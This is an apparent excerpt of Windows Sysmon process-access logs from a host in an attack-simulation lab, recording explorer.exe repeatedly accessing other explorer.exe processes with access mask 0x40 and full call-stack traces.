16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 